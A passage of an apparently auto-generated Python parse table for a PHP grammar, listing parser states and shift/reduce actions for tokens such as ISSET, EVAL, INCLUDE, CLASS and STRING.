59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,-38,-40,-42,-443,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,59,-8,-443,59,-30,-22,-24,-25,-26,59,-11,-12,59,59,-39,-41,-43,-44,59,-45,-46,59,59,-56,59,59,59,59,59,59,59,59,-7,59,-9,59,59,-28,59,59,59,59,59,59,59,-443,59,59,59,59,59,59,59,-10,-29,-443,-443,59,59,-33,-70,-443,-37,-49,-443,-53,-57,-60,-443,-111,59,59,59,-27,-443,-62,59,59,59,-51,-55,59,-110,59,59,-31,-64,59,-34,59,-85,59,-443,-443,-443,-109,59,-65,-71,59,-36,-83,-443,-443,-92,-93,-86,-87,59,-61,59,59,59,-443,-35,-76,-443,59,-443,59,-88,-54,-108,59,-32,59,59,59,-63,-84,-443,-443,-77,59,-443,59,-52,59,]),'ISSET':([0,2,3,4,5,6,7,9,10,13,19,23,24,25,28,29,32,41,45,46,47,48,49,52,53,54,55,56,57,58,59,63,64,65,66,68,69,114,119,120,121,129,130,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,161,162,163,164,166,168,180,191,192,193,194,195,196,197,198,199,200,201,202,205,218,245,246,251,265,267,268,270,275,276,277,285,286,287,288,289,291,292,295,304,336,345,346,347,348,351,352,355,356,360,361,375,389,404,407,423,425,429,432,441,442,443,444,446,449,477,479,485,487,488,489,490,500,501,528,532,556,557,559,560,566,570,613,614,616,617,620,621,622,630,634,636,637,638,639,640,657,679,682,693,703,740,741,742,746,748,759,762,763,776,803,806,811,813,814,820,822,825,826,832,835,836,841,861,862,867,868,869,870,871,874,875,876,877,878,881,882,883,884,907,908,909,910,911,912,913,914,915,917,918,934,935,937,938,940,951,954,955,962,963,964,967,972,973,975,],[-443,60,-3,-2,-4,-5,-6,60,-50,-443,60,60,60,60,60,-47,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,-443,60,60,-23,60,-48,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,-38,-40,-42,-443,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,-8,-443,60,-30,-22,-24,-25,-26,60,-11,-12,60,60,-39,-41,-43,-44,60,-45,-46,60,60,-56,60,60,60,60,60,60,60,60,-7,60,-9,60,60,-28,6
0,60,60,60,60,60,60,-443,60,60,60,60,60,60,60,-10,-29,-443,-443,60,60,-33,-70,-443,-37,-49,-443,-53,-57,-60,-443,-111,60,60,60,-27,-443,-62,60,60,60,-51,-55,60,-110,60,60,-31,-64,60,-34,60,-85,60,-443,-443,-443,-109,60,-65,-71,60,-36,-83,-443,-443,-92,-93,-86,-87,60,-61,60,60,60,-443,-35,-76,-443,60,-443,60,-88,-54,-108,60,-32,60,60,60,-63,-84,-443,-443,-77,60,-443,60,-52,60,]),'EMPTY':([0,2,3,4,5,6,7,9,10,13,19,23,24,25,28,29,32,41,45,46,47,48,49,52,53,54,55,56,57,58,59,63,64,65,66,68,69,114,119,120,121,129,130,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,161,162,163,164,166,168,180,191,192,193,194,195,196,197,198,199,200,201,202,205,218,245,246,251,265,267,268,270,275,276,277,285,286,287,288,289,291,292,295,304,336,345,346,347,348,351,352,355,356,360,361,375,389,404,407,423,425,429,432,441,442,443,444,446,449,477,479,485,487,488,489,490,500,501,528,532,556,557,559,560,566,570,613,614,616,617,620,621,622,630,634,636,637,638,639,640,657,679,682,693,703,740,741,742,746,748,759,762,763,776,803,806,811,813,814,820,822,825,826,832,835,836,841,861,862,867,868,869,870,871,874,875,876,877,878,881,882,883,884,907,908,909,910,911,912,913,914,915,917,918,934,935,937,938,940,951,954,955,962,963,964,967,972,973,975,],[-443,61,-3,-2,-4,-5,-6,61,-50,-443,61,61,61,61,61,-47,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,-443,61,61,-23,61,-48,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,-38,-40,-42,-443,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,61,-8,-443,61,-30,-22,-24,-25,-26,61,-11,-12,61,61,-39,-41,-43,-44,61,-45,-46,61,61,-56,61,61,61,61,61,61,61,61,-7,61,-9,61,61,-28,61,61,61,61,61,61,61,-443,61,61,61,61,61,61,61,-10,-29,-443,-443,61,61,-33,-70,-443,-37,-49,-443,-53,-57,-60,-443,-111,61,61,61,-27,-443,-62,61,61,61,-51,-55,61,-110,61,61,-31,-64,61,-34,61,-85,61,-443,-443,-443,-109,61,-65,-71,61,-36,-83,-443,-443,-92,-93,-86,-87,61
,-61,61,61,61,-443,-35,-76,-443,61,-443,61,-88,-54,-108,61,-32,61,61,61,-63,-84,-443,-443,-77,61,-443,61,-52,61,]),'EVAL':([0,2,3,4,5,6,7,9,10,13,19,23,24,25,28,29,32,41,45,46,47,48,49,52,53,54,55,56,57,58,59,63,64,65,66,68,69,114,119,120,121,129,130,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,161,162,163,164,166,168,180,191,192,193,194,195,196,197,198,199,200,201,202,205,218,245,246,251,265,267,268,270,275,276,277,285,286,287,288,289,291,292,295,304,336,345,346,347,348,351,352,355,356,360,361,375,389,404,407,423,425,429,432,441,442,443,444,446,449,477,479,485,487,488,489,490,500,501,528,532,556,557,559,560,566,570,613,614,616,617,620,621,622,630,634,636,637,638,639,640,657,679,682,693,703,740,741,742,746,748,759,762,763,776,803,806,811,813,814,820,822,825,826,832,835,836,841,861,862,867,868,869,870,871,874,875,876,877,878,881,882,883,884,907,908,909,910,911,912,913,914,915,917,918,934,935,937,938,940,951,954,955,962,963,964,967,972,973,975,],[-443,62,-3,-2,-4,-5,-6,62,-50,-443,62,62,62,62,62,-47,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,-443,62,62,-23,62,-48,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,-38,-40,-42,-443,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,62,-8,-443,62,-30,-22,-24,-25,-26,62,-11,-12,62,62,-39,-41,-43,-44,62,-45,-46,62,62,-56,62,62,62,62,62,62,62,62,-7,62,-9,62,62,-28,62,62,62,62,62,62,62,-443,62,62,62,62,62,62,62,-10,-29,-443,-443,62,62,-33,-70,-443,-37,-49,-443,-53,-57,-60,-443,-111,62,62,62,-27,-443,-62,62,62,62,-51,-55,62,-110,62,62,-31,-64,62,-34,62,-85,62,-443,-443,-443,-109,62,-65,-71,62,-36,-83,-443,-443,-92,-93,-86,-87,62,-61,62,62,62,-443,-35,-76,-443,62,-443,62,-88,-54,-108,62,-32,62,62,62,-63,-84,-443,-443,-77,62,-443,62,-52,62,]),'INCLUDE':([0,2,3,4,5,6,7,9,10,13,19,23,24,25,28,29,32,41,45,46,47,48,49,52,53,54,55,56,57,58,59,63,64,65,66,68,69,114,119,120,121,129,130,132,133,134,1
35,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,161,162,163,164,166,168,180,191,192,193,194,195,196,197,198,199,200,201,202,205,218,245,246,251,265,267,268,270,275,276,277,285,286,287,288,289,291,292,295,304,336,345,346,347,348,351,352,355,356,360,361,375,389,404,407,423,425,429,432,441,442,443,444,446,449,477,479,485,487,488,489,490,500,501,528,532,556,557,559,560,566,570,613,614,616,617,620,621,622,630,634,636,637,638,639,640,657,679,682,693,703,740,741,742,746,748,759,762,763,776,803,806,811,813,814,820,822,825,826,832,835,836,841,861,862,867,868,869,870,871,874,875,876,877,878,881,882,883,884,907,908,909,910,911,912,913,914,915,917,918,934,935,937,938,940,951,954,955,962,963,964,967,972,973,975,],[-443,63,-3,-2,-4,-5,-6,63,-50,-443,63,63,63,63,63,-47,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,-443,63,63,-23,63,-48,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,-38,-40,-42,-443,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,-8,-443,63,-30,-22,-24,-25,-26,63,-11,-12,63,63,-39,-41,-43,-44,63,-45,-46,63,63,-56,63,63,63,63,63,63,63,63,-7,63,-9,63,63,-28,63,63,63,63,63,63,63,-443,63,63,63,63,63,63,63,-10,-29,-443,-443,63,63,-33,-70,-443,-37,-49,-443,-53,-57,-60,-443,-111,63,63,63,-27,-443,-62,63,63,63,-51,-55,63,-110,63,63,-31,-64,63,-34,63,-85,63,-443,-443,-443,-109,63,-65,-71,63,-36,-83,-443,-443,-92,-93,-86,-87,63,-61,63,63,63,-443,-35,-76,-443,63,-443,63,-88,-54,-108,63,-32,63,63,63,-63,-84,-443,-443,-77,63,-443,63,-52,63,]),'INCLUDE_ONCE':([0,2,3,4,5,6,7,9,10,13,19,23,24,25,28,29,32,41,45,46,47,48,49,52,53,54,55,56,57,58,59,63,64,65,66,68,69,114,119,120,121,129,130,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,161,162,163,164,166,168,180,191,192,193,194,195,196,197,198,199,200,201,202,205,218,245,246,251,265,267,268,270,275,276,277,285,286,287,288,289,291,292,295,304,
336,345,346,347,348,351,352,355,356,360,361,375,389,404,407,423,425,429,432,441,442,443,444,446,449,477,479,485,487,488,489,490,500,501,528,532,556,557,559,560,566,570,613,614,616,617,620,621,622,630,634,636,637,638,639,640,657,679,682,693,703,740,741,742,746,748,759,762,763,776,803,806,811,813,814,820,822,825,826,832,835,836,841,861,862,867,868,869,870,871,874,875,876,877,878,881,882,883,884,907,908,909,910,911,912,913,914,915,917,918,934,935,937,938,940,951,954,955,962,963,964,967,972,973,975,],[-443,64,-3,-2,-4,-5,-6,64,-50,-443,64,64,64,64,64,-47,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,-443,64,64,-23,64,-48,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,-38,-40,-42,-443,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,-8,-443,64,-30,-22,-24,-25,-26,64,-11,-12,64,64,-39,-41,-43,-44,64,-45,-46,64,64,-56,64,64,64,64,64,64,64,64,-7,64,-9,64,64,-28,64,64,64,64,64,64,64,-443,64,64,64,64,64,64,64,-10,-29,-443,-443,64,64,-33,-70,-443,-37,-49,-443,-53,-57,-60,-443,-111,64,64,64,-27,-443,-62,64,64,64,-51,-55,64,-110,64,64,-31,-64,64,-34,64,-85,64,-443,-443,-443,-109,64,-65,-71,64,-36,-83,-443,-443,-92,-93,-86,-87,64,-61,64,64,64,-443,-35,-76,-443,64,-443,64,-88,-54,-108,64,-32,64,64,64,-63,-84,-443,-443,-77,64,-443,64,-52,64,]),'REQUIRE':([0,2,3,4,5,6,7,9,10,13,19,23,24,25,28,29,32,41,45,46,47,48,49,52,53,54,55,56,57,58,59,63,64,65,66,68,69,114,119,120,121,129,130,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,161,162,163,164,166,168,180,191,192,193,194,195,196,197,198,199,200,201,202,205,218,245,246,251,265,267,268,270,275,276,277,285,286,287,288,289,291,292,295,304,336,345,346,347,348,351,352,355,356,360,361,375,389,404,407,423,425,429,432,441,442,443,444,446,449,477,479,485,487,488,489,490,500,501,528,532,556,557,559,560,566,570,613,614,616,617,620,621,622,630,634,636,637,638,639,640,657,679,682,693,703,740,741,742,746,748,
759,762,763,776,803,806,811,813,814,820,822,825,826,832,835,836,841,861,862,867,868,869,870,871,874,875,876,877,878,881,882,883,884,907,908,909,910,911,912,913,914,915,917,918,934,935,937,938,940,951,954,955,962,963,964,967,972,973,975,],[-443,65,-3,-2,-4,-5,-6,65,-50,-443,65,65,65,65,65,-47,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,-443,65,65,-23,65,-48,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,-38,-40,-42,-443,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,-8,-443,65,-30,-22,-24,-25,-26,65,-11,-12,65,65,-39,-41,-43,-44,65,-45,-46,65,65,-56,65,65,65,65,65,65,65,65,-7,65,-9,65,65,-28,65,65,65,65,65,65,65,-443,65,65,65,65,65,65,65,-10,-29,-443,-443,65,65,-33,-70,-443,-37,-49,-443,-53,-57,-60,-443,-111,65,65,65,-27,-443,-62,65,65,65,-51,-55,65,-110,65,65,-31,-64,65,-34,65,-85,65,-443,-443,-443,-109,65,-65,-71,65,-36,-83,-443,-443,-92,-93,-86,-87,65,-61,65,65,65,-443,-35,-76,-443,65,-443,65,-88,-54,-108,65,-32,65,65,65,-63,-84,-443,-443,-77,65,-443,65,-52,65,]),'REQUIRE_ONCE':([0,2,3,4,5,6,7,9,10,13,19,23,24,25,28,29,32,41,45,46,47,48,49,52,53,54,55,56,57,58,59,63,64,65,66,68,69,114,119,120,121,129,130,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,161,162,163,164,166,168,180,191,192,193,194,195,196,197,198,199,200,201,202,205,218,245,246,251,265,267,268,270,275,276,277,285,286,287,288,289,291,292,295,304,336,345,346,347,348,351,352,355,356,360,361,375,389,404,407,423,425,429,432,441,442,443,444,446,449,477,479,485,487,488,489,490,500,501,528,532,556,557,559,560,566,570,613,614,616,617,620,621,622,630,634,636,637,638,639,640,657,679,682,693,703,740,741,742,746,748,759,762,763,776,803,806,811,813,814,820,822,825,826,832,835,836,841,861,862,867,868,869,870,871,874,875,876,877,878,881,882,883,884,907,908,909,910,911,912,913,914,915,917,918,934,935,937,938,940,951,954,955,962,963,964,967,972,973,975,],[-443,66,-3,-2,-4,-5,
-6,66,-50,-443,66,66,66,66,66,-47,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,-443,66,66,-23,66,-48,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,-38,-40,-42,-443,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,-8,-443,66,-30,-22,-24,-25,-26,66,-11,-12,66,66,-39,-41,-43,-44,66,-45,-46,66,66,-56,66,66,66,66,66,66,66,66,-7,66,-9,66,66,-28,66,66,66,66,66,66,66,-443,66,66,66,66,66,66,66,-10,-29,-443,-443,66,66,-33,-70,-443,-37,-49,-443,-53,-57,-60,-443,-111,66,66,66,-27,-443,-62,66,66,66,-51,-55,66,-110,66,66,-31,-64,66,-34,66,-85,66,-443,-443,-443,-109,66,-65,-71,66,-36,-83,-443,-443,-92,-93,-86,-87,66,-61,66,66,66,-443,-35,-76,-443,66,-443,66,-88,-54,-108,66,-32,66,66,66,-63,-84,-443,-443,-77,66,-443,66,-52,66,]),'PRINT':([0,2,3,4,5,6,7,9,10,13,19,23,24,25,28,29,32,41,45,46,47,48,49,52,53,54,55,56,57,58,59,63,64,65,66,68,69,114,119,120,121,129,130,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,161,162,163,164,166,168,180,191,192,193,194,195,196,197,198,199,200,201,202,205,218,245,246,251,265,267,268,270,275,276,277,285,286,287,288,289,291,292,295,304,336,345,346,347,348,351,352,355,356,360,361,375,389,404,407,423,425,429,432,441,442,443,444,446,449,477,479,485,487,488,489,490,500,501,528,532,556,557,559,560,566,570,613,614,616,617,620,621,622,630,634,636,637,638,639,640,657,679,682,693,703,740,741,742,746,748,759,762,763,776,803,806,811,813,814,820,822,825,826,832,835,836,841,861,862,867,868,869,870,871,874,875,876,877,878,881,882,883,884,907,908,909,910,911,912,913,914,915,917,918,934,935,937,938,940,951,954,955,962,963,964,967,972,973,975,],[-443,68,-3,-2,-4,-5,-6,68,-50,-443,68,68,68,68,68,-47,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,-443,68,68,-23,68,-48,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,-38,-40,-42,-443,68,68,68,68,68,68,68,68,68,68,68,68,6
8,68,68,68,68,68,68,68,68,-8,-443,68,-30,-22,-24,-25,-26,68,-11,-12,68,68,-39,-41,-43,-44,68,-45,-46,68,68,-56,68,68,68,68,68,68,68,68,-7,68,-9,68,68,-28,68,68,68,68,68,68,68,-443,68,68,68,68,68,68,68,-10,-29,-443,-443,68,68,-33,-70,-443,-37,-49,-443,-53,-57,-60,-443,-111,68,68,68,-27,-443,-62,68,68,68,-51,-55,68,-110,68,68,-31,-64,68,-34,68,-85,68,-443,-443,-443,-109,68,-65,-71,68,-36,-83,-443,-443,-92,-93,-86,-87,68,-61,68,68,68,-443,-35,-76,-443,68,-443,68,-88,-54,-108,68,-32,68,68,68,-63,-84,-443,-443,-77,68,-443,68,-52,68,]),'AT':([0,2,3,4,5,6,7,9,10,13,19,23,24,25,28,29,32,41,45,46,47,48,49,52,53,54,55,56,57,58,59,63,64,65,66,68,69,114,119,120,121,129,130,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,161,162,163,164,166,168,180,191,192,193,194,195,196,197,198,199,200,201,202,205,218,245,246,251,265,267,268,270,275,276,277,285,286,287,288,289,291,292,295,304,336,345,346,347,348,351,352,355,356,360,361,375,389,404,407,423,425,429,432,441,442,443,444,446,449,477,479,485,487,488,489,490,500,501,528,532,556,557,559,560,566,570,613,614,616,617,620,621,622,630,634,636,637,638,639,640,657,679,682,693,703,740,741,742,746,748,759,762,763,776,803,806,811,813,814,820,822,825,826,832,835,836,841,861,862,867,868,869,870,871,874,875,876,877,878,881,882,883,884,907,908,909,910,911,912,913,914,915,917,918,934,935,937,938,940,951,954,955,962,963,964,967,972,973,975,],[-443,69,-3,-2,-4,-5,-6,69,-50,-443,69,69,69,69,69,-47,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,-443,69,69,-23,69,-48,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,-38,-40,-42,-443,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,-8,-443,69,-30,-22,-24,-25,-26,69,-11,-12,69,69,-39,-41,-43,-44,69,-45,-46,69,69,-56,69,69,69,69,69,69,69,69,-7,69,-9,69,69,-28,69,69,69,69,69,69,69,-443,69,69,69,69,69,69,69,-10,-29,-443,-443,69,69,-33,-70,-443,-37,-49,-443,-53,-57,-60,-443,-
111,69,69,69,-27,-443,-62,69,69,69,-51,-55,69,-110,69,69,-31,-64,69,-34,69,-85,69,-443,-443,-443,-109,69,-65,-71,69,-36,-83,-443,-443,-92,-93,-86,-87,69,-61,69,69,69,-443,-35,-76,-443,69,-443,69,-88,-54,-108,69,-32,69,69,69,-63,-84,-443,-443,-77,69,-443,69,-52,69,]),'LPAREN':([0,2,3,4,5,6,7,8,9,10,12,13,16,18,19,20,21,22,23,24,25,28,29,30,32,33,34,35,41,42,44,45,46,47,48,49,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,82,83,100,101,102,104,106,107,110,111,114,116,117,119,120,121,129,130,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,161,162,163,164,166,168,180,183,184,185,191,192,193,194,195,196,197,198,199,200,201,202,205,206,207,208,209,212,213,214,218,229,234,245,246,251,259,265,267,268,269,270,271,274,275,276,277,278,279,285,286,287,288,289,290,291,292,294,295,300,301,302,303,304,305,336,338,345,346,347,348,351,352,355,356,360,361,364,375,389,392,396,404,407,408,418,423,425,426,428,429,430,431,432,441,442,443,444,446,449,457,467,468,477,479,481,482,485,487,488,489,490,500,501,527,528,529,530,531,532,541,542,543,556,557,559,560,563,564,565,566,570,571,572,573,574,575,576,577,578,579,580,581,582,583,584,585,586,587,588,589,590,591,592,593,594,602,613,614,616,617,618,620,621,622,627,630,634,636,637,638,639,640,657,675,676,679,682,693,698,701,703,734,735,740,741,742,746,748,759,760,762,763,767,776,789,791,792,803,806,811,812,813,814,817,818,820,822,825,826,832,835,836,841,854,856,860,861,862,864,867,868,869,870,871,874,875,876,877,878,881,882,883,884,894,895,907,908,909,910,911,912,913,914,915,917,918,923,924,934,935,937,938,940,951,954,955,962,963,964,967,972,973,975,],[-443,9,-3,-2,-4,-5,-6,108,9,-50,119,-443,129,159,9,161,162,163,9,9,9,9,-47,179,9,182,-443,-429,9,217,218,9,9,9,9,9,9,9,9,9,9,9,9,9,244,245,246,9,9,9,9,251,9,9,-342,-343,-250,-226,265,-228,-237,-239,-443,-190,-443,-429,-430,9,9,-23,9,-48,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,-38,-40,-42,-443,365,-167,-16
8,9,9,9,9,9,9,9,9,9,9,9,9,9,389,-185,-186,-187,-192,-225,-228,9,119,-228,9,9,9,425,9,9,9,-227,9,-228,365,-8,-443,9,444,-428,-30,-22,-24,-25,-26,448,9,-11,457,-12,479,-443,-244,-248,9,-250,9,488,-39,-41,-43,-44,9,-45,-46,9,9,-56,504,9,9,-188,533,9,9,425,479,9,9,556,557,9,559,560,9,-7,9,-9,9,9,-28,457,602,457,9,9,-243,-245,9,9,9,9,9,-443,9,-229,9,-189,-443,-230,9,444,556,559,9,9,9,9,-235,-236,-240,-10,-29,457,457,457,457,457,457,457,457,457,457,457,457,457,457,457,457,457,457,457,457,457,457,457,457,457,-443,-443,9,9,-249,-33,-70,-443,752,-37,-49,-443,-53,-57,-60,-443,-111,-191,-194,9,9,9,803,806,-27,457,457,-443,-62,9,9,9,-51,831,-55,9,837,-110,-231,-193,-232,9,9,-31,861,-64,9,-246,-247,-34,9,-85,9,-443,-443,-443,-109,-195,479,457,9,-65,907,-71,9,-36,-83,-443,-443,-92,-93,-86,-87,9,-61,9,9,457,927,9,-443,-35,-76,-443,9,-443,9,-88,-54,-108,944,457,9,-32,9,9,9,-63,-84,-443,-443,-77,9,-443,9,-52,9,]),'CLASS':([0,2,3,4,5,6,7,10,13,29,71,72,114,120,121,130,164,166,168,180,260,275,276,277,285,286,287,288,289,292,295,345,346,347,348,352,355,360,361,441,442,443,449,500,566,570,608,613,614,620,621,622,630,634,636,637,638,639,640,657,703,740,741,742,746,759,762,763,776,811,813,820,825,832,835,836,841,862,867,869,870,871,874,875,876,877,878,881,882,883,884,908,909,910,911,912,913,914,915,917,918,935,937,938,940,951,954,955,962,963,964,967,972,973,975,],[-443,70,-3,-2,-4,-5,-6,-50,-443,-47,254,255,-443,70,-23,-48,-38,-40,-42,-443,427,-8,-443,70,-30,-22,-24,-25,-26,-11,-12,-39,-41,-43,-44,-45,-46,70,-56,-7,70,-9,-28,-443,-10,-29,427,-443,-443,-33,-70,-443,-37,-49,-443,-53,-57,-60,-443,-111,-27,-443,-62,70,70,-51,-55,70,-110,-31,-64,-34,-85,-443,-443,-443,-109,-65,-71,-36,-83,-443,-443,-92,-93,-86,-87,70,-61,70,70,-443,-35,-76,-443,70,-443,70,-88,-54,-108,-32,70,70,70,-63,-84,-443,-443,-77,70,-443,70,-52,70,]),'ABSTRACT':([0,2,3,4,5,6,7,10,13,29,114,120,121,130,164,166,168,180,275,276,277,285,286,287,288,289,292,295,345,346,347,348,352,355,360,361,373,441,442,443,449,500,519,522,5
23,566,570,613,614,620,621,622,630,634,636,637,638,639,640,650,654,655,657,658,662,665,666,667,668,669,670,671,672,703,740,741,742,746,759,762,763,774,776,777,788,811,813,820,825,832,835,836,841,844,849,853,862,867,869,870,871,874,875,876,877,878,881,882,883,884,890,893,908,909,910,911,912,913,914,915,917,918,930,935,937,938,940,946,951,954,955,962,963,964,966,967,968,972,973,974,975,977,],[-443,71,-3,-2,-4,-5,-6,-50,-443,-47,-443,71,-23,-48,-38,-40,-42,-443,-8,-443,71,-30,-22,-24,-25,-26,-11,-12,-39,-41,-43,-44,-45,-46,71,-56,-443,-7,71,-9,-28,-443,-443,668,-130,-10,-29,-443,-443,-33,-70,-443,-37,-49,-443,-53,-57,-60,-443,-443,668,-136,-111,-129,668,-159,-163,-164,-165,-166,-160,-161,-162,-27,-443,-62,71,71,-51,-55,71,668,-110,-135,-158,-31,-64,-34,-85,-443,-443,-443,-109,-139,-132,-134,-65,-71,-36,-83,-443,-443,-92,-93,-86,-87,71,-61,71,71,-138,-141,-443,-35,-76,-443,71,-443,71,-88,-54,-108,-133,-32,71,71,71,-140,-63,-84,-443,-443,-77,71,-131,-443,-157,71,-52,-137,71,-156,]),'FINAL':([0,2,3,4,5,6,7,10,13,29,114,120,121,130,164,166,168,180,275,276,277,285,286,287,288,289,292,295,345,346,347,348,352,355,360,361,373,441,442,443,449,500,519,522,523,566,570,613,614,620,621,622,630,634,636,637,638,639,640,650,654,655,657,658,662,665,666,667,668,669,670,671,672,703,740,741,742,746,759,762,763,774,776,777,788,811,813,820,825,832,835,836,841,844,849,853,862,867,869,870,871,874,875,876,877,878,881,882,883,884,890,893,908,909,910,911,912,913,914,915,917,918,930,935,937,938,940,946,951,954,955,962,963,964,966,967,968,972,973,974,975,977,],[-443,72,-3,-2,-4,-5,-6,-50,-443,-47,-443,72,-23,-48,-38,-40,-42,-443,-8,-443,72,-30,-22,-24,-25,-26,-11,-12,-39,-41,-43,-44,-45,-46,72,-56,-443,-7,72,-9,-28,-443,-443,669,-130,-10,-29,-443,-443,-33,-70,-443,-37,-49,-443,-53,-57,-60,-443,-443,669,-136,-111,-129,669,-159,-163,-164,-165,-166,-160,-161,-162,-27,-443,-62,72,72,-51,-55,72,669,-110,-135,-158,-31,-64,-34,-85,-443,-443,-443,-109,-139,-132,-134,-65,-71,-36,-83,-443,-443,-92,-93,-86,-
87,72,-61,72,72,-138,-141,-443,-35,-76,-443,72,-443,72,-88,-54,-108,-133,-32,72,72,72,-140,-63,-84,-443,-443,-77,72,-131,-443,-157,72,-52,-137,72,-156,]),'QUOTE':([0,2,3,4,5,6,7,9,10,13,19,23,24,25,28,29,32,35,41,45,46,47,48,49,52,53,54,55,56,57,58,59,63,64,65,66,68,69,76,114,119,120,121,129,130,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,161,162,163,164,166,168,180,186,191,192,193,194,195,196,197,198,199,200,201,202,205,218,245,246,251,257,258,265,267,268,270,275,276,277,285,286,287,288,289,291,292,294,295,304,336,345,346,347,348,351,352,354,355,356,360,361,366,375,389,404,407,420,421,422,423,425,429,432,441,442,443,444,446,449,455,456,457,460,468,477,479,485,487,488,489,490,500,501,503,528,532,556,557,559,560,566,570,571,572,573,574,575,576,577,578,579,580,581,582,583,584,585,586,587,588,589,590,591,592,593,594,599,602,613,614,616,617,620,621,622,630,634,636,637,638,639,640,646,657,679,682,691,692,693,694,703,734,735,740,741,742,746,748,759,762,763,764,771,773,776,799,803,806,811,813,814,820,822,825,826,832,835,836,839,841,851,860,861,862,867,868,869,870,871,874,875,876,877,878,881,882,883,884,894,901,907,908,909,910,911,912,913,914,915,917,918,924,928,934,935,937,938,940,951,954,955,962,963,964,967,972,973,975,],[-443,76,-3,-2,-4,-5,-6,76,-50,-443,76,76,76,76,76,-47,76,186,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,-443,-443,76,76,-23,76,-48,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,-38,-40,-42,-443,-443,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,419,-432,76,76,76,76,-8,-443,76,-30,-22,-24,-25,-26,76,-11,460,-12,76,76,-39,-41,-43,-44,76,-45,460,-46,76,76,-56,511,76,76,76,76,-431,-433,-434,76,76,76,76,-7,76,-9,76,76,-28,460,460,460,598,460,76,76,76,76,76,76,76,-443,76,460,76,76,76,76,76,76,-10,-29,460,460,460,460,460,460,460,460,460,460,460,460,460,460,460,460,460,460,460,460,460,460,460,460,729,460,-443,-443,76,76,-33,-70
,-443,-37,-49,-443,-53,-57,-60,-443,460,-111,76,76,-436,-437,76,-439,-27,460,460,-443,-62,76,76,76,-51,-55,76,460,460,460,-110,-435,76,76,-31,-64,76,-34,76,-85,76,-443,-443,-443,460,-109,460,460,76,-65,-71,76,-36,-83,-443,-443,-92,-93,-86,-87,76,-61,76,76,460,-438,76,-443,-35,-76,-443,76,-443,76,-88,-54,-108,460,460,76,-32,76,76,76,-63,-84,-443,-443,-77,76,-443,76,-52,76,]),'STRING':([0,2,3,4,5,6,7,9,10,11,13,14,15,19,23,24,25,28,29,32,34,36,37,38,40,41,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,63,64,65,66,68,69,70,81,114,115,118,119,120,121,128,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,161,162,163,164,166,168,173,179,180,182,183,184,185,191,192,193,194,195,196,197,198,199,200,201,202,